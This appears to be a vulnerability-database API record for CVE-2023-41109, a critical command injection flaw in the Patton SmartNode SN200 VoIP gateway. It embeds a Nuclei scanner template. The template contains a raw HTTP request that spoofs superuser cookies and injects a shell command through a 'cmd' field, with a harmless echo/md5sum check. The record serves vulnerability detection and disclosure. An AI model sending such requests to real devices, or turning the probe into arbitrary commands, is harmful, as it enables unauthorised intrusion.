{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2023-41109/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2023-41109/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2023-41109/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2023-41109/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2023-41109/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2023-41109"},"sightings":{"href":"/api/v1/sightings/cve-2023-41109"}},"enrichments":{"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2023/CVE-2023-41109.yaml","nuclei_template_severity":"critical","nuclei_template_yaml":"id: CVE-2023-41109\n\ninfo:\n  name: SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway - Command Injection\n  author: princechaddha\n  severity: critical\n  description: |\n    The SmartNode SN200 Analog Telephone Adapter (ATA) & VoIP Gateway is vulnerable to command injection.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands on the affected device.\n  remediation: |\n    Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n  reference:\n    - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2023-019.txt\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-41109\n    - http://packetstormsecurity.com/files/175945/SmartNode-SN200-3.21.2-23021-OS-Command-Injection.html\n    - http://seclists.org/fulldisclosure/2023/Nov/12\n    - https://www.syss.de/\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n    cvss-score: 9.8\n    cve-id: CVE-2023-41109\n    cwe-id: CWE-78\n    epss-score: 0.6451\n    epss-percentile: 0.99211\n    cpe: cpe:2.3:h:patton:smartnode_sn200:-:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 1\n    vendor: patton\n    product: smartnode_sn200\n  tags: cve,cve2023,smartnode,voip,patton,vkev,vuln\n\nvariables:\n  payload: \"echo CVE-2023-41109 | md5sum\"\n\nhttp:\n  - raw:\n      - |\n        POST /rest/xxxxxxxxxxxxxxx/xxxxxxx?executeAsync HTTP/1.1\n        Host: {{Hostname}}\n        Cookie: AuthToken=; AuthGroup=superuser; UserName=admin\n\n        {\"cmd\":\"{{payload}}\",\"arguments\":[]}\n\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"dd556350275e2ee0a2e877cea9c8a74a\"\n# digest: 4a0a004730450220034e642ea3e17adb27b6e24f795797731c67c337a1787f2e451c237c9ca9558b022100f04aca627d4803247de8e80bbd88ee63dcb6f96a537d0c7465b65889b006e453:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2023-41109"}